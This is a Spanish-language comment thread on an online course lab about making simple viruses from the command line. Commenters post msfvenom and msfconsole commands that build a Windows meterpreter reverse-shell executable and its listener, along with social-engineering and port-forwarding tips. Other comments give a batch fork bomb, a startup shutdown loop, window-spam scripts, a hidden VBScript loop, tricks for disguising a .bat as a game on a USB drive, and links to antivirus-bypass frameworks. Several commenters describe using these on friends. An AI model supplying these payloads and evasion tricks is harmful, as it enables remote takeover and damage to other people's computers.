Laboratorio: Creación de virus sencillos utilizando la consola de comandos

Hola, mencionar también que para crear un malware desde la distro de Linux, Kali Linux, pueden seguir los siguientes pasos:

Desde la consola escribir

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(LaIpDelHost) LPORT=(ElNúmeroDelPuerto) -f > exe (NombreDelMalware).exe

¿Qué estamos haciendo?
Bien, primero estamos usando la herramienta msfvenom, la cual nos sirve para crear payloads, el -p es para asignar que paylodad usaremos, en este caso se usara el payload “windows/meterpreter/reverse_tcp” esto significa que tendremos una sesión de meterpreter para controlar al equipo infectado a través de un protocolo tcp reverso, luego estamos asignado el LHOST, es decir, la ip del equipo desde la cual controlaremos al equipo infectado, luego el LPORT que por defecto se usa el 4444, luego le asignamos el formato y le decimos que será un .exe y le damos un nombre, y así nos generará el malware, ya queda usar algo de ingeniería social para hacer que este malware entre al equipo que queremos infectar. (Cabe resaltar que este tipo de malware ya es detectado por muchos antivirus, es solo como guía para que vean como se pueden crear malware un poco más “avanzados”.

Luego de esto, necesitamos tener en escucha nuestra consola para poder conectarnos remotamente al equipo infectado, para poder poner nuestra consola en escucha, usaremos:

Primero escribimos:

msfconsole

Una vez que se abra msfconsole escribimos los siguientes comandos:

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST (LaIpDelHost)
set LPORT (ElNúmeroDelPuerto)

una vez configurado escribiremos:

exploit o run

le damos a enter y ya estará escuchando.

(Este método funciona en redes lan donde ambos dispositivos, el atacante y el atacado están en la misma red, puede ser en redes externas a la privada pero en ese caso se tendría que abrir el puerto a usar en la configuración del router y usar la ip publica de nuestra máquina no la privada.)
Úsenlo para fines éticos.

Otra forma de hacer un bucle abriendo las aplicaciones es esta
sin tener que copiar varias veces
@echo off
:e
start cmd. exe
start calc.exe
goto e

Esto no es nada pero lo es todo para mi 💜

Yo creo que muchos hicimos esa broma y conocíamos esto jajaj llenar un bloc de notas de miles de Start y apenas lo habrán una lluvia de ventanas jajaja tenia un amigo que hacia que se iniciaran paginas digamos, no aptas para menores de edad jajajajajaaj

Incluso el engaño se puede disimular mejor todavía de la siguiente manera, se crea una carpeta dentro del usb con cualquier nombre, en este caso yo le puse ‘DATA’ , dentro de esa carpeta se pone el archivo .bat original y un archivo de imagen del tipo .ico … Luego hacemos un acceso directo del .bat al archivo raíz del usb, y le cambiamos el nombre a “juego mario” o lo que sea. Una vez creado el acceso directo nos vamos a propiedades > change icon > browse , navegamos hasta la carpeta ‘DATA’ del usb y seleccionamos el archivo .ico para cambiar la imagen del shortcut, luego aplicar.

Venga ya…
¡Tremendo curso, no me arrepiento de tomarlo! 😄

start calc.exe
start notepad.exe
start cmd.exe

La NASA quiere saber su ubicación !!!

usteded considera realmente ese archivo .bat como virus? Que bajo nivel

Incluso de puede hacer una Bomba Fork que es aun mas peligroso, podrían crear un archivo en bloc de notas y escribir %0|%0, lo guardan como .bat y cuando lo abren, básicamente te deja congelada la computadora y no podrás hacer nada, poco a poco se empezara a alentar y en algunas ocasiones ni siquiera te dejara apagarla. Si se llega a probar este Script pueden hacerlo en una maquina virtual para que no dañen su computadora principal, es preferible virtualizar e intentarlo, no importa que versión de Windows sea, en todas las versiones cuelga a Windows.

En la secundaria hacía bat’s con bromas similares, les cambiaba el icono para que pareciera que era Word o Internet Explorer y al abrir, PUM! Empezaba a mandar alertas con mensajes de broma para espantar a los demás.

Los .BAT, son muy comunes que se bloqueen por cualquier antivirus, o hasta el mismo software de correo.

Me acuerdo cuando en primaria me ponia a ‘programar’ en bat. Algo que hacia era poner el comando ‘shutdown’ con un timer y un mensaje de ‘te hackea muajaja’. Era divertido dejarlos en mi labratoria de computo haha

buen ejemplo, tambien se puede poner a que se ejecute solito sin esperar el clic del usuario con un autorun (windows)

para que tanto start si tan solo necesitas que se habra google chrome

Dejo un poquito un código un poquito más elaborado en VBasic, que se podría renombrar o esconder dentro de una aplicación o fotografía.

<do
msgbox "Este es un virus"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "SP26" & Chr(34), 0
Set WshShell = Nothing
loop>

Me logro sacar una buena risa, muy divertido

dammmmm que cool jajaja increible

En una ocacion hice uno en C++ donde llenaba el disco duro con basura

Si quieren generar payloads que hagan bypass del antivirus, les recomiendo utilizar:

Veil Framkework
https://github.com/Veil-Framework/Veil

Empire
https://github.com/EmpireProject/Empire

El mejor curso hasta el momento 😄

horrible curso

me parece interesante la forma en la que podemos crear virus y ejecutarlos en las maquinas a las cuales les vamos a hacer el ataque

Otra broma podria ser colocar un codigo como:
shutdown -s -t 5
Guardarlo como un .bat y colocarlo el .bat en el inicio de windows. La maquina se apagara cada vez que inicie windows, una de las formas de retiarlo seria ingresando por modo seguro y quitar el .bat del inicio. XD

no lo habia pensado, pero esto me hizo recordar las “bromas” de youtuber donde filtran el numero de alguien y su celular colapsa de tantas llamadas y mensajes que recibe por parte de las personas como si fuera un ataque DDoS

que sencillo es crear un virus y uno descargando cualquier archivo en el pc

Gracias por los laboratorios

Este script no sería un virus ya que carece de facilidades para autoreplicarse.

Muy interesante , lo pasare a otros…

Buena práctica. Implementarlo en VB fue genial. Saludos

Que simple hacer un virus jajaja quien lo diría

un ejemplo muy simple

super e interesante esta creación de virus…

muy muy simple el virus lo que difícil de pasar por Internet,

Molestare a mis amigos con ese virus =) ja gracias y aprender =)

super

(Y)

Interesante, por allí lo envié para jugar un abroma a un par de amigos veremos que pasa.

Muy sencillo crear este tipo de virus.

.

si voy a hacerlo con mis amigos con un aviso al principio donde diga que me deben una cerveza por reparar su computadora. jajajajaja!!!

buen aporte

La maquina virtual de windows no me reconoce el pendrive. que sera?

Esto funciona así por que está usando la terminal de windows verdad? Por ejemplo quiero hacer algo para algún sistema basado en unix, tengo que usar el lenguaje del shell no? por que en esos sistemas el shell mismo tiene su propio lenguaje de programación.

ejejej Esta interesante

Para generar payloads que hagan un excelente bypass del antivirus, les recomiendo:
Veil Framework
https://github.com/Veil-Framework/Veil

Empire
https://github.com/EmpireProject/Empire

Alguien tiene mas información como esta? es interesante.

Recuerdo en uno de los laboratorios de mis primeros cursos de programación en la universidad, tratando de hacer una calculadora con punteros, en varias ocasiones me saltaba el antivirus con una alerta donde decía “se ha detectado un gusano…”.

Que lindo que es el mundo de la programación jejeje.🤣

Hacer estas cosas tan simples y que pueden ser tan molestas es algo divertido, no me quiero ni imaginar lo que debe ser hacer un malware que realmente genere un daño significativo.

Profesor hice el .bar en la laptop de mi mama y ahora ya no enciende 😦

Que clase tan interesante, la verdad con algo tan sencillo se puede hacer tantas cosas.
Me encanta mucho este concepto de curso en el cual tienes laboratorios en donde puedes realizar este tipo de pruebas.

Muy Divertido este laboratorio.
Btcrt